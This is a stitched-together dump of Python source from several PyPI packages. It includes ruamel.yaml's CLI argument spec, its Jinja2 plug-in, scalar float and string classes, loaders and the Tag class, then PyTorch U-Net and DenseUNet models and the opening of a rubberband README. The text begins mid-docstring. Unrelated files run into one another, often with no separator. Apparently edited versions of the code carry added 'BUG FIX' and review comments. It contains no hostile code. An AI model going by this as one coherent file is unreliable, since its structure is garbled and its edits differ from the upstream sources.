- !Opt [create-to-yaml, !Action store_true, !Help create a tagged to_yaml method even if available]
- !Arg [file, !Nargs '*']
- !Help convert Python pickle file(s) to YAML
- mapping:
- !Alias map
# - !Opt [output, o, !Help write to file OUTPUT instead of stdout]
- !Arg [key, !Help key of the new root-level mapping]
- !Arg [file, !Help file with YAML content that will be value for key]
- !Help create new YAML file with at root a mapping with key and file content
- add:
- !Option ['parents', !Action store_true, !H create parents if necessary]
- !Option ['item', !Action store_true, !H 'create item']
- !Option ['key', !Action store_true, !H 'create key, even if not found in siblings of item']
- !Option ['str', !Action store_true, !H store value as string]
- !Option ['file', !H use FILE instead of first argument as YAML file]
- !Option ['value', !H use FILE instead of first argument as YAML file]
- !Option ['sep', !H set separator for splitting single element path]
- !Arg [args, !Nargs '*', !H '[file] path in yaml/path.in.yaml [value]']
- !Help add a value to a path in the data structure loaded from YAML
- !Prolog >
Add a value to a path in the data structure loaded from YAML.
Use value are resolved like in YAML, use --str if necessary
The value is the last args token.
The "path" in the data structure is taken from all other args,
interpreting numerical values as indices in list/seq.
E.g.:
yaml add --parents --value Windows test.yaml computers os type
yaml add --file test.yaml computers os secure false
yaml add --str test.yaml computers.os.year 2019
- sort:
- !Option ['file', !H use FILE instead of first argument as YAML file]
- !Arg [args, !Nargs '*', !H '[file] [path in yaml/path.in.yaml]']
- !Prolog |
Load the file, check if path leads to a mapping, sort by key
and write back. No path -> work on root of data structure.
File is not written if mapping is already in sorted order.
- !Help sort the keys of a mapping in a YAML file
- edit:
- !Arg [file, !H 'file to edit using $EDITOR']
- !Help Edit a YAML document, save over orginal only when loadable
- !Prolog >
Edits a copy of the file argument and only updates the file when the copy
is loadable YAML. The copy is not removed after exiting editor if not
parseable and used (if not older than the original file) to continue.
Copy is named .ye.<filename>
- tokens:
- !Arg [file, !H 'file to edit using $EDITOR']
- !Help show tokens
- events:
- !Arg [file, !H 'file to edit using $EDITOR']
- !Help show events
- generate:
- !Prolog |
generate a file filled with random YAML until it reaches size
- !Option [size, default: 10, !Help size in Kb]
- !Option [levels, !Help 'levels in file (e.g. sm_s1m) ']
- !Arg [file, !H 'name of the file to generate']
- analyse:
- !Option [typ, !Help YAML typ to create]
- !Option [pure, !Action store_true, !Help create pure YAML instance]
- !Arg [file, !H 'name of the file to load']
""" # NOQA | /ruamel.yaml.cmd-0.6.5-py3-none-any.whl/ruamel/yaml/cmd/__init__.py | 0.594434 | 0.218232 | __init__.py | pypi |
from __future__ import absolute_import, unicode_literals
import ruamel.yaml
# typing import is only for mypy's benefit; the guard keeps it out of runtime
if False: # MYPY
    from typing import Any # NOQA

# name under which this plug-in is registered; also used as the suffix of the
# '_plug_in_<typ>' attribute that carries per-loader metadata (see below)
typ = 'jinja2'
class MyReader(ruamel.yaml.reader.Reader):
    """Reader that masks Jinja2 syntax ('{{- ', '{{', '{%') with YAML-safe
    substitute patterns before scanning, and records the substitutions on the
    loader (under '_plug_in_<typ>') so the emitter side can reverse them."""

    def __init__(self, stream, loader):
        # the plug-in machinery always hands the text in later via the
        # .stream property, never through the constructor
        assert stream is None
        assert loader is not None
        ruamel.yaml.reader.Reader.__init__(self, stream, loader)

    @property
    def stream(self):
        return ruamel.yaml.reader.Reader.stream.fget(self)

    @stream.setter
    def stream(self, val):
        if val is None:
            return ruamel.yaml.reader.Reader.stream.fset(self, val)
        s = val.read() if hasattr(val, 'read') else val
        reverse = {}
        md = dict(reverse=reverse)
        # stash the reverse mapping on the loader for the emitter plug-in
        setattr(self.loader, '_plug_in_' + typ, md)
        if_pat = ('{{- ', ' #<{- ')
        if if_pat[0] in s:
            s = s.replace(if_pat[0], if_pat[1])
            # BUG FIX: the original tested ``if_pat not in reverse`` -- a tuple
            # can never be a key of the string-keyed mapping, so the guard was
            # a no-op; test the replacement string itself.
            if if_pat[1] not in reverse:
                reverse[if_pat[1]] = if_pat[0]
        # find a substitute pattern '<'*n + '{' that does not occur in the input
        # (n renamed from 'len', which shadowed the builtin)
        for n in range(1, 10):
            pat = '<' * n + '{'
            if pat not in s:
                s = s.replace('{{', pat)
                reverse[pat] = '{{'
                break
        else:
            raise NotImplementedError('could not find substitute pattern ' + pat)
        # likewise '#'*n + '%' as a stand-in for '{%'
        for n in range(1, 10):
            pat = '#' * n + '%'
            if pat not in s:
                s = s.replace('{%', pat)
                reverse[pat] = '{%'
                break
        else:
            raise NotImplementedError('could not find substitute pattern ' + pat)
        return ruamel.yaml.reader.Reader.stream.fset(self, s)
class Rewriter:
    """File-like shim placed between the emitter and the real output stream.

    Undoes the pattern substitutions recorded by the reader before the text
    reaches the caller's stream.  ``md`` is the metadata dict stored on the
    loader under '_plug_in_<typ>'; only its 'reverse' mapping is used.
    """

    def __init__(self, out, md):
        self.reverse = md['reverse']  # substitute pattern -> original Jinja2 text
        self.out = out

    def write(self, data):
        """Reverse all substitutions in *data*, then forward it once.

        BUG FIX: the original called ``self.out.write`` inside the loop,
        emitting one (partially restored) copy of the data per recorded
        pattern -- and nothing at all when no substitutions were recorded.
        """
        for pattern, original in self.reverse.items():
            try:
                data = data.replace(pattern, original)
            except TypeError:
                # bytes were handed in; decode once and retry
                data = data.decode('utf-8')
                data = data.replace(pattern, original)
        self.out.write(data)
class MyEmitter(ruamel.yaml.emitter.Emitter):
    """Emitter that wraps the output stream in a Rewriter so the reader's
    Jinja2 substitutions are undone on the way out."""

    def __init__(self, *args, **kw):
        # the stream is always provided later via the .stream property
        assert args[0] is None
        ruamel.yaml.emitter.Emitter.__init__(self, *args, **kw)

    @property
    def stream(self):
        return ruamel.yaml.emitter.Emitter.stream.fget(self)

    @stream.setter
    def stream(self, val):
        if val is None:
            return ruamel.yaml.emitter.Emitter.stream.fset(self, None)
        # wrap the real stream; the metadata was stored by MyReader under the
        # same '_plug_in_<typ>' attribute name
        return ruamel.yaml.emitter.Emitter.stream.fset(
            self, Rewriter(val, getattr(self.dumper, '_plug_in_' + typ))
        )
def init_typ(self):
    """Configure a YAML instance for typ='jinja2': the standard round-trip
    component stack, with the reader/emitter replaced by the masking pair
    defined above.  Presumably installed as a method on the YAML instance by
    the plug-in loader -- confirm against the plug-in machinery."""
    self.Reader = MyReader
    self.Emitter = MyEmitter
    self.Serializer = ruamel.yaml.serializer.Serializer # type: Any
    self.Representer = ruamel.yaml.representer.RoundTripRepresenter # type: Any
    self.Scanner = ruamel.yaml.scanner.RoundTripScanner # type: Any
    self.Parser = ruamel.yaml.parser.RoundTripParser # type: Any
    self.Composer = ruamel.yaml.composer.Composer # type: Any
    self.Constructor = ruamel.yaml.constructor.RoundTripConstructor # type: Any
"""
class Sanitize:
def __init__(self):
self.accacc = None
self.accper = None
def __call__(self, s):
len = 1
for len in range(1, 10):
pat = '<' * len + '{'
if pat not in s:
self.accacc = pat
break
else:
raise NotImplementedError('could not find substitute pattern '+pat)
len = 1
for len in range(1, 10):
pat = '#' * len + '%'
if pat not in s:
self.accper = pat
break
else:
raise NotImplementedError('could not find substitute pattern '+pat)
return s.replace('{{', self.accacc).replace('{%', self.accper)
def revert(self, s):
return s.replace(self.accacc, '{{').replace(self.accper, '{%')
def update_one(file_name, out_file_name=None):
sanitize = Sanitize()
with open(file_name) as fp:
data = yaml.load(sanitize(fp.read()))
myArray = data['A']['B'][1]['myArray']
pos = myArray.index('val2')
myArray.insert(pos+1, 'val 3')
if out_file_name is None:
yaml.dump(data, sys.stdout, transform=sanitize.revert)
else:
with open(out_file_name, 'w') as fp:
yaml.dump(data, out, transform=sanitize.revert)
update_one('input.yaml')
""" | /ruamel.yaml.jinja2-0.2.7.tar.gz/ruamel.yaml.jinja2-0.2.7/__plug_in__.py | 0.704973 | 0.213234 | __plug_in__.py | pypi |
import sys
from ruamel.yaml.anchor import Anchor
from typing import Text, Any, Dict, List # NOQA
__all__ = ['ScalarFloat', 'ExponentialFloat', 'ExponentialCapsFloat']
class ScalarFloat(float):
    """Float subclass that remembers the textual presentation of the original
    YAML scalar (width, precision, mantissa sign/leading zeros, exponent
    formatting, underscores) plus an optional anchor, so the value can be
    written back unchanged on round-trip."""

    def __new__(cls: Any, *args: Any, **kw: Any) -> Any:
        # layout keywords are popped so the remainder is a plain float() call
        width = kw.pop('width', None)
        prec = kw.pop('prec', None)
        m_sign = kw.pop('m_sign', None)
        m_lead0 = kw.pop('m_lead0', 0)
        exp = kw.pop('exp', None)
        e_width = kw.pop('e_width', None)
        e_sign = kw.pop('e_sign', None)
        underscore = kw.pop('underscore', None)
        anchor = kw.pop('anchor', None)
        v = float.__new__(cls, *args, **kw)
        v._width = width
        v._prec = prec
        v._m_sign = m_sign
        v._m_lead0 = m_lead0
        v._exp = exp
        v._e_width = e_width
        v._e_sign = e_sign
        v._underscore = underscore
        if anchor is not None:
            v.yaml_set_anchor(anchor, always_dump=True)
        return v

    # In-place arithmetic deliberately degrades to a plain float: the stored
    # layout information would no longer describe the new value.  The original
    # bodies carried unreachable attribute-copying code after the return
    # statement; that dead code has been removed.
    def __iadd__(self, a: Any) -> Any:  # type: ignore
        return float(self) + a

    def __ifloordiv__(self, a: Any) -> Any:  # type: ignore
        return float(self) // a

    def __imul__(self, a: Any) -> Any:  # type: ignore
        return float(self) * a

    def __ipow__(self, a: Any) -> Any:  # type: ignore
        return float(self) ** a

    def __isub__(self, a: Any) -> Any:  # type: ignore
        return float(self) - a

    @property
    def anchor(self) -> Any:
        # create the Anchor lazily on first access
        if not hasattr(self, Anchor.attrib):
            setattr(self, Anchor.attrib, Anchor())
        return getattr(self, Anchor.attrib)

    def yaml_anchor(self, any: bool = False) -> Any:
        """Return the anchor if one is set (and marked for dumping, unless
        *any* is true), else None."""
        if not hasattr(self, Anchor.attrib):
            return None
        if any or self.anchor.always_dump:
            return self.anchor
        return None

    def yaml_set_anchor(self, value: Any, always_dump: bool = False) -> None:
        self.anchor.value = value
        self.anchor.always_dump = always_dump

    def dump(self, out: Any = sys.stdout) -> None:
        """Write a one-line debug representation of the value and its stored
        layout attributes to *out*."""
        out.write(
            f'ScalarFloat({self}| w:{self._width}, p:{self._prec}, '  # type: ignore
            f's:{self._m_sign}, lz:{self._m_lead0}, _:{self._underscore}|{self._exp}'
            f', w:{self._e_width}, s:{self._e_sign})\n'
        )
class ExponentialFloat(ScalarFloat):
    # marker subclass: presumably for scalars written in lowercase
    # exponential form (e.g. 1.0e3) -- confirm against the scanner
    def __new__(cls, value: Any, width: Any = None, underscore: Any = None) -> Any:
        return ScalarFloat.__new__(cls, value, width=width, underscore=underscore)


class ExponentialCapsFloat(ScalarFloat):
    # marker subclass: presumably for scalars written in uppercase
    # exponential form (e.g. 1.0E3) -- confirm against the scanner
    def __new__(cls, value: Any, width: Any = None, underscore: Any = None) -> Any:
        return ScalarFloat.__new__(cls, value, width=width, underscore=underscore)
from ruamel.yaml.anchor import Anchor
from typing import Text, Any, Dict, List # NOQA
from ruamel.yaml.compat import SupportsIndex
__all__ = [
'ScalarString',
'LiteralScalarString',
'FoldedScalarString',
'SingleQuotedScalarString',
'DoubleQuotedScalarString',
'PlainScalarString',
# PreservedScalarString is the old name, as it was the first to be preserved on rt,
# use LiteralScalarString instead
'PreservedScalarString',
]
class ScalarString(str):
    """Base class for str subclasses that remember their original YAML
    quoting/block style; also carries an optional anchor."""

    __slots__ = Anchor.attrib

    def __new__(cls, *args: Any, **kw: Any) -> Any:
        anchor = kw.pop('anchor', None)
        obj = str.__new__(cls, *args, **kw)
        if anchor is None:
            return obj
        obj.yaml_set_anchor(anchor, always_dump=True)
        return obj

    def replace(self, old: Any, new: Any, maxreplace: SupportsIndex = -1) -> Any:
        # keep the subclass (and thus the style) on the result
        replaced = str.replace(self, old, new, maxreplace)
        return type(self)(replaced)

    @property
    def anchor(self) -> Any:
        # create the Anchor lazily on first access
        if not hasattr(self, Anchor.attrib):
            setattr(self, Anchor.attrib, Anchor())
        return getattr(self, Anchor.attrib)

    def yaml_anchor(self, any: bool = False) -> Any:
        """Return the anchor if one is set (and marked for dumping, unless
        *any* is true), else None."""
        if not hasattr(self, Anchor.attrib):
            return None
        if self.anchor.always_dump or any:
            return self.anchor
        return None

    def yaml_set_anchor(self, value: Any, always_dump: bool = False) -> None:
        self.anchor.value = value
        self.anchor.always_dump = always_dump
class LiteralScalarString(ScalarString):
    """Scalar that round-trips in literal block style ('|')."""
    __slots__ = 'comment' # the comment after the | on the first line
    style = '|'

    def __new__(cls, value: Text, anchor: Any = None) -> Any:
        return ScalarString.__new__(cls, value, anchor=anchor)


# historical alias: 'preserved' was the original name for literal scalars
PreservedScalarString = LiteralScalarString


class FoldedScalarString(ScalarString):
    """Scalar that round-trips in folded block style ('>')."""
    __slots__ = ('fold_pos', 'comment') # the comment after the > on the first line
    style = '>'

    def __new__(cls, value: Text, anchor: Any = None) -> Any:
        return ScalarString.__new__(cls, value, anchor=anchor)


class SingleQuotedScalarString(ScalarString):
    """Scalar that round-trips single quoted."""
    __slots__ = ()
    style = "'"

    def __new__(cls, value: Text, anchor: Any = None) -> Any:
        return ScalarString.__new__(cls, value, anchor=anchor)


class DoubleQuotedScalarString(ScalarString):
    """Scalar that round-trips double quoted."""
    __slots__ = ()
    style = '"'

    def __new__(cls, value: Text, anchor: Any = None) -> Any:
        return ScalarString.__new__(cls, value, anchor=anchor)


class PlainScalarString(ScalarString):
    """Scalar that round-trips unquoted (plain style)."""
    __slots__ = ()
    style = ''

    def __new__(cls, value: Text, anchor: Any = None) -> Any:
        return ScalarString.__new__(cls, value, anchor=anchor)
def preserve_literal(s: Text) -> Text:
    """Normalize all line endings in *s* to '\\n' and wrap the result as a
    LiteralScalarString so it is dumped in literal block style."""
    normalized = s.replace('\r\n', '\n').replace('\r', '\n')
    return LiteralScalarString(normalized)
def walk_tree(base: Any, map: Any = None) -> None:
    """
    Walk a simple YAML tree (recursing into dict values and list items),
    converting strings that contain a trigger character via the supplied
    mapping; by default strings with newlines become literal block scalars.

    You can also provide an explicit (ordered) mapping for multiple
    transforms (the first matching one is applied):

        map = ruamel.yaml.compat.ordereddict
        map['\n'] = preserve_literal
        map[':'] = SingleQuotedScalarString
        walk_tree(data, map=map)
    """
    from collections.abc import MutableMapping, MutableSequence

    if map is None:
        map = {'\n': preserve_literal}

    _unchanged = object()  # sentinel: no trigger character matched

    def _convert(value: Any) -> Any:
        # apply the first transform whose trigger character occurs in value
        for ch in map:
            if ch in value:
                return map[ch](value)
        return _unchanged

    if isinstance(base, MutableMapping):
        for key in base:
            entry: Text = base[key]
            if isinstance(entry, str):
                converted = _convert(entry)
                if converted is not _unchanged:
                    base[key] = converted
            else:
                walk_tree(entry, map=map)
    elif isinstance(base, MutableSequence):
        for idx, entry in enumerate(base):
            if isinstance(entry, str):
                converted = _convert(entry)
                if converted is not _unchanged:
                    base[idx] = converted
            else:
                walk_tree(entry, map=map)
from ruamel.yaml.reader import Reader
from ruamel.yaml.scanner import Scanner, RoundTripScanner
from ruamel.yaml.parser import Parser, RoundTripParser
from ruamel.yaml.composer import Composer
from ruamel.yaml.constructor import (
BaseConstructor,
SafeConstructor,
Constructor,
RoundTripConstructor,
)
from ruamel.yaml.resolver import VersionedResolver
from typing import Any, Dict, List, Union, Optional # NOQA
from ruamel.yaml.compat import StreamTextType, VersionType # NOQA
__all__ = ['BaseLoader', 'SafeLoader', 'Loader', 'RoundTripLoader']
class BaseLoader(Reader, Scanner, Parser, Composer, BaseConstructor, VersionedResolver):
    """Loader composed of the base (tag-agnostic) pipeline components.

    Each mixin is initialized explicitly with ``loader=self`` so the
    components can find one another through the shared loader object.
    """

    def __init__(
        self,
        stream: StreamTextType,
        version: Optional[VersionType] = None,
        preserve_quotes: Optional[bool] = None,
    ) -> None:
        # preserve_quotes is accepted for a uniform signature; only the
        # round-trip constructor (see RoundTripLoader) uses it
        self.comment_handling = None
        Reader.__init__(self, stream, loader=self)
        Scanner.__init__(self, loader=self)
        Parser.__init__(self, loader=self)
        Composer.__init__(self, loader=self)
        BaseConstructor.__init__(self, loader=self)
        VersionedResolver.__init__(self, version, loader=self)
class SafeLoader(Reader, Scanner, Parser, Composer, SafeConstructor, VersionedResolver):
    """Loader that constructs only standard YAML tags (SafeConstructor)."""

    def __init__(
        self,
        stream: StreamTextType,
        version: Optional[VersionType] = None,
        preserve_quotes: Optional[bool] = None,
    ) -> None:
        # preserve_quotes is accepted for a uniform signature; only the
        # round-trip constructor (see RoundTripLoader) uses it
        self.comment_handling = None
        Reader.__init__(self, stream, loader=self)
        Scanner.__init__(self, loader=self)
        Parser.__init__(self, loader=self)
        Composer.__init__(self, loader=self)
        SafeConstructor.__init__(self, loader=self)
        VersionedResolver.__init__(self, version, loader=self)
class Loader(Reader, Scanner, Parser, Composer, Constructor, VersionedResolver):
    """Loader using the full (non-safe) Constructor."""

    def __init__(
        self,
        stream: StreamTextType,
        version: Optional[VersionType] = None,
        preserve_quotes: Optional[bool] = None,
    ) -> None:
        # preserve_quotes is accepted for a uniform signature; only the
        # round-trip constructor (see RoundTripLoader) uses it
        self.comment_handling = None
        Reader.__init__(self, stream, loader=self)
        Scanner.__init__(self, loader=self)
        Parser.__init__(self, loader=self)
        Composer.__init__(self, loader=self)
        Constructor.__init__(self, loader=self)
        VersionedResolver.__init__(self, version, loader=self)
class RoundTripLoader(
    Reader,
    RoundTripScanner,
    RoundTripParser,
    Composer,
    RoundTripConstructor,
    VersionedResolver,
):
    """Loader that preserves comments, quoting style and other layout
    information, using the round-trip scanner/parser/constructor."""

    def __init__(
        self,
        stream: StreamTextType,
        version: Optional[VersionType] = None,
        preserve_quotes: Optional[bool] = None,
    ) -> None:
        # self.reader = Reader.__init__(self, stream)
        self.comment_handling = None  # issue 385
        Reader.__init__(self, stream, loader=self)
        RoundTripScanner.__init__(self, loader=self)
        RoundTripParser.__init__(self, loader=self)
        Composer.__init__(self, loader=self)
        # only this loader honours preserve_quotes
        RoundTripConstructor.__init__(self, preserve_quotes=preserve_quotes, loader=self)
        VersionedResolver.__init__(self, version, loader=self)
from typing import Any, Dict, Optional, List, Union, Optional, Iterator # NOQA
# attribute name under which a node's original Tag object is stored
tag_attrib = '_yaml_tag'
class Tag:
    """Store the original tag (handle + suffix) of a node so it can be
    written back unchanged when round-tripping."""

    # attribute name used to attach Tag instances to other objects
    attrib = tag_attrib

    def __init__(self, handle: Any = None, suffix: Any = None, handles: Any = None) -> None:
        self.handle = handle
        self.suffix = suffix
        # mapping of tag handles to their prefixes (e.g. '!!' -> a full URI)
        self.handles = handles
        # set exactly once via select_transform(); consulted by trval
        self._transform_type: Optional[bool] = None

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}({self.trval!r})'

    def __str__(self) -> str:
        return f'{self.trval}'

    def __hash__(self) -> int:
        # the hash is cached; handle/suffix must not change after first use
        try:
            return self._hash_id  # type: ignore
        except AttributeError:
            self._hash_id = res = hash((self.handle, self.suffix))
            return res

    def __eq__(self, other: Any) -> bool:
        # other should not be a string, but the serializer sometimes provides these
        if isinstance(other, str):
            return self.trval == other
        return bool(self.trval == other.trval)

    def startswith(self, x: str) -> bool:
        # str-like convenience so a Tag can be used where a tag string is expected
        if self.trval is not None:
            return self.trval.startswith(x)
        return False

    @property
    def trval(self) -> Optional[str]:
        """Transformed (handle-resolved, percent-decoded) tag value;
        computed lazily and cached in ``self._trval``."""
        try:
            return self._trval
        except AttributeError:
            pass
        if self.handle is None:
            # suffix-only tag: just the decoded suffix
            self._trval: Optional[str] = self.uri_decoded_suffix
            return self._trval
        # select_transform() must have been called before the first access
        assert self._transform_type is not None
        if not self._transform_type:
            # the non-round-trip case
            self._trval = self.handles[self.handle] + self.uri_decoded_suffix
            return self._trval
        # round-trip case
        # NOTE(review): both branches below produce the same value; the
        # commented-out line suggests the else-branch was meant to keep the
        # original handle -- confirm intent before simplifying.
        if self.handle == '!!' and self.suffix in (
            'null',
            'bool',
            'int',
            'float',
            'binary',
            'timestamp',
            'omap',
            'pairs',
            'set',
            'str',
            'seq',
            'map',
        ):
            self._trval = self.handles[self.handle] + self.uri_decoded_suffix
        else:
            # self._trval = self.handle + self.suffix
            self._trval = self.handles[self.handle] + self.uri_decoded_suffix
        return self._trval

    # alias kept for callers that access .value
    value = trval

    @property
    def uri_decoded_suffix(self) -> Optional[str]:
        """Suffix with %xx escapes decoded (cached).

        NOTE(review): each %xx pair is decoded with chr() individually, so
        multi-byte UTF-8 percent-escape sequences are not combined into one
        character -- confirm whether that is intended.
        """
        try:
            return self._uri_decoded_suffix
        except AttributeError:
            pass
        if self.suffix is None:
            self._uri_decoded_suffix: Optional[str] = None
            return None
        res = ''
        # don't have to check for scanner errors here
        idx = 0
        while idx < len(self.suffix):
            ch = self.suffix[idx]
            idx += 1
            if ch != '%':
                res += ch
            else:
                res += chr(int(self.suffix[idx : idx + 2], 16))
                idx += 2
        self._uri_decoded_suffix = res
        return res

    def select_transform(self, val: bool) -> None:
        """
        val: False -> non-round-trip
        True -> round-trip
        """
        # may only be called once per Tag instance
        assert self._transform_type is None
        self._transform_type = val

    def check_handle(self) -> bool:
        # True when a handle is set but unknown in the handles mapping
        if self.handle is None:
            return False
        return self.handle not in self.handles
import torch
import torch.nn as nn
import torch.nn.functional as F
class double_conv2d_bn(nn.Module):
    """Two (Conv2d -> BatchNorm2d -> ReLU) stages.

    With the default 'same' padding and stride 1 the spatial size is kept;
    the channel count becomes ``out_channels`` after the first stage.
    """

    def __init__(self, in_channels, out_channels, kernel_size=3, strides=1, padding='same'):
        super(double_conv2d_bn, self).__init__()
        self.conv1 = nn.Conv2d(
            in_channels, out_channels,
            kernel_size=kernel_size, stride=strides, padding=padding, bias=True,
        )
        self.conv2 = nn.Conv2d(
            out_channels, out_channels,
            kernel_size=kernel_size, stride=strides, padding=padding, bias=True,
        )
        self.bn1 = nn.BatchNorm2d(out_channels)
        self.bn2 = nn.BatchNorm2d(out_channels)

    def forward(self, x):
        h = self.conv1(x)
        h = F.relu(self.bn1(h))
        h = self.conv2(h)
        return F.relu(self.bn2(h))
class deconv2d_bn(nn.Module):
    """ConvTranspose2d -> BatchNorm2d -> ReLU.

    With the default 2x2 kernel and stride 2 this doubles the spatial
    resolution (the up-sampling step of the U-Net decoder).
    """

    def __init__(self, in_channels, out_channels, kernel_size=2, strides=2):
        super(deconv2d_bn, self).__init__()
        self.conv1 = nn.ConvTranspose2d(
            in_channels, out_channels,
            kernel_size=kernel_size, stride=strides, bias=True,
        )
        self.bn1 = nn.BatchNorm2d(out_channels)

    def forward(self, x):
        return F.relu(self.bn1(self.conv1(x)))
class Unet(nn.Module):
    """U-Net with configurable depth.

    Args:
        input_channels: channels of the input image; the output has the same
            number of channels.
        blocks: number of down-sampling (and matching up-sampling) steps.
        n: base filter count; it doubles at every down-sampling step.

    BUG FIX: the original constructed every conv/deconv layer inside
    ``forward``, so each call used fresh random weights and none of them were
    registered as parameters -- the network produced random output and could
    never be trained.  All layers are now created once in ``__init__`` and
    registered via nn.ModuleList.
    """

    def __init__(self, input_channels, blocks, n):
        super(Unet, self).__init__()
        self.input_channels = input_channels
        self.blocks = blocks
        self.n = n
        self.sigmoid = nn.Sigmoid()
        # encoder: channel widths n, 2n, 4n, ...
        self.down_convs = nn.ModuleList()
        for i in range(blocks):
            in_ch = input_channels if i == 0 else pow(2, i - 1) * n
            self.down_convs.append(double_conv2d_bn(in_ch, pow(2, i) * n))
        # bottleneck between encoder and decoder
        self.mid_conv = double_conv2d_bn(pow(2, blocks - 1) * n, pow(2, blocks) * n)
        # decoder: transposed conv halves the channels, then a double conv
        # fuses the up-sampled features with the matching skip connection
        self.up_deconvs = nn.ModuleList()
        self.up_convs = nn.ModuleList()
        for i in reversed(range(blocks)):
            self.up_deconvs.append(deconv2d_bn(pow(2, i + 1) * n, pow(2, i) * n))
            self.up_convs.append(double_conv2d_bn(pow(2, i + 1) * n, pow(2, i) * n))
        # 1-channel-width projection back to the input channel count
        self.out_conv = nn.Conv2d(n, input_channels, kernel_size=3,
                                  stride=1, padding='same', bias=True)

    def forward(self, x):
        skips = []
        out = x
        # contracting path: convolve, remember for the skip, then pool
        for down in self.down_convs:
            conv = down(out)
            skips.append(conv)
            out = F.max_pool2d(conv, 2)
        # bottleneck
        out = self.mid_conv(out)
        # expanding path: skip connections are consumed in reverse order
        for deconv, fuse, skip in zip(self.up_deconvs, self.up_convs, reversed(skips)):
            up = deconv(out)
            out = fuse(torch.cat([up, skip], dim=1))
        return self.sigmoid(self.out_conv(out))
import torch
from torch.functional import block_diag
import torch.nn as nn
from torch.nn.modules import activation
from torch.nn.modules.dropout import Dropout
class Dense_layer(nn.Module):
    """One DenseNet composite layer: BN -> 1x1 conv -> ReLU -> BN -> 3x3 conv
    -> ReLU -> dropout.

    The 1x1 "bottleneck" convolution widens to ``4 * output_channels`` before
    the 3x3 convolution narrows back down, keeping the network thin and the
    cost of the 3x3 convolution low.  ``output_channels`` is the growth rate;
    DenseNet favours small values such as 32.

    Args:
        input_channels: channels of the incoming feature map.
        output_channels: growth rate, i.e. channels this layer contributes.
        p: dropout probability applied to the layer's output.

    Fix: removed a stray no-op ``pass`` left at the end of ``__init__``.
    """

    def __init__(self, input_channels, output_channels=32, p=0.2):
        super(Dense_layer, self).__init__()
        self.bn1 = nn.BatchNorm2d(input_channels)
        self.conv1 = nn.Conv2d(input_channels, output_channels * 4,
                               kernel_size=1, padding='same')
        self.bn2 = nn.BatchNorm2d(output_channels * 4)
        self.conv2 = nn.Conv2d(output_channels * 4, output_channels,
                               kernel_size=3, padding='same')
        self.activation = nn.ReLU(inplace=True)
        self.drop = nn.Dropout(p)

    def forward(self, x):
        x = self.bn1(x)
        x = self.conv1(x)
        x = self.activation(x)
        x = self.bn2(x)
        x = self.conv2(x)
        x = self.activation(x)
        x = self.drop(x)
        return x
class DenseBlock(nn.Module):
    """One dense block of four ``Dense_layer`` units.

    Each layer receives the concatenation of the block input and every
    earlier layer's output, and the block returns all five feature maps
    concatenated along the channel axis (input + 4 * growth-rate channels).
    """

    def __init__(self, input_channels, output_channels):
        super(DenseBlock, self).__init__()
        self.dense_layer1 = Dense_layer(input_channels, output_channels)
        self.dense_layer2 = Dense_layer(input_channels + output_channels, output_channels)
        self.dense_layer3 = Dense_layer(input_channels + 2 * output_channels, output_channels)
        self.dense_layer4 = Dense_layer(input_channels + 3 * output_channels, output_channels)

    def forward(self, x):
        # Accumulate every feature map; each layer consumes all of them so far.
        features = [x]
        layers = (self.dense_layer1, self.dense_layer2,
                  self.dense_layer3, self.dense_layer4)
        for layer in layers:
            features.append(layer(torch.cat(features, dim=1)))
        return torch.cat(features, dim=1)
class Transition(nn.Module):
    """Down-sampling transition between dense blocks.

    Batch-norm, then a 1x1 convolution that shrinks the channel count by
    ``reduction`` (default 0.5, i.e. halves it), then 2x2 max-pooling that
    halves the spatial resolution.
    """

    def __init__(self, input_channels, reduction=0.5):
        super(Transition, self).__init__()
        self.bn = nn.BatchNorm2d(input_channels)
        self.conv = nn.Conv2d(input_channels, int(input_channels * reduction),
                              kernel_size=1, padding='same')
        self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2)

    def forward(self, x):
        return self.maxpool(self.conv(self.bn(x)))
class DenseUNet(nn.Module):
    """U-Net whose stages are ``DenseBlock``s, with ``Transition`` layers for
    down-sampling and transposed convolutions for up-sampling.

    Args:
        input_channels: channels of the input image (output matches).
        blocks: number of down-sampling (and matching up-sampling) stages.
        growth_rate: channels each dense layer contributes (k in the paper).
        reduction: channel shrink factor of each transition layer, in (0, 1].

    Bug fix: the original implementation instantiated every sub-module inside
    ``forward``, so layers got fresh random weights on every call and their
    parameters were never registered (hence untrainable).  The channel
    bookkeeping is fully determined by the constructor arguments, so all
    sub-modules are now built once in ``__init__`` using the same arithmetic.
    """

    def __init__(self, input_channels, blocks, growth_rate, reduction=0.5):
        super(DenseUNet, self).__init__()
        self.input_channels = input_channels
        self.blocks = blocks
        self.growth_rate = growth_rate
        self.reduction = reduction
        # Encoder: dense block (+4k channels) then transition (xreduction).
        self.down_blocks = nn.ModuleList()
        self.transitions = nn.ModuleList()
        skip_dims = []  # channel counts of the stored skip connections
        dim = input_channels
        for _ in range(blocks):
            self.down_blocks.append(DenseBlock(dim, growth_rate))
            dim = dim + 4 * growth_rate
            skip_dims.append(dim)
            self.transitions.append(Transition(dim, reduction))
            dim = int(dim * reduction)
        # Decoder: dense block, then upsample to the matching skip's width.
        self.up_blocks = nn.ModuleList()
        self.up_deconvs = nn.ModuleList()
        for i in range(blocks):
            self.up_blocks.append(DenseBlock(dim, growth_rate))
            target = skip_dims[blocks - i - 1]
            self.up_deconvs.append(nn.ConvTranspose2d(
                dim + 4 * growth_rate, target, kernel_size=2, stride=2, bias=True))
            # After concatenation with the skip, channels double.
            dim = 2 * target
        # Output head: two dense blocks then a 3x3 projection back to the
        # input channel count.
        self.head_block1 = DenseBlock(dim, growth_rate)
        self.head_block2 = DenseBlock(dim + 4 * growth_rate, growth_rate)
        self.head_conv = nn.Conv2d(dim + 8 * growth_rate, self.input_channels,
                                   kernel_size=3, padding='same')
        self.head_act = nn.ReLU(inplace=True)

    def forward(self, x):
        """Run the encoder/decoder and the output head."""
        skips = []
        for dense, trans in zip(self.down_blocks, self.transitions):
            feat = dense(x)
            skips.append(feat)
            x = trans(feat)
        for i, (dense, deconv) in enumerate(zip(self.up_blocks, self.up_deconvs)):
            up = deconv(dense(x))
            x = torch.cat([up, skips[self.blocks - i - 1]], dim=1)
        out = self.head_block1(x)
        out = self.head_block2(out)
        return self.head_act(self.head_conv(out))
if __name__ == '__main__':
    # Smoke test: a forward pass on random data should preserve the shape.
    net = DenseUNet(1, 4, 32)
    sample = torch.rand([2, 1, 512, 512])
    prediction = net(sample)
    print(prediction.shape)
README for rubberband Python3 Module
====================================
Introduction
------------
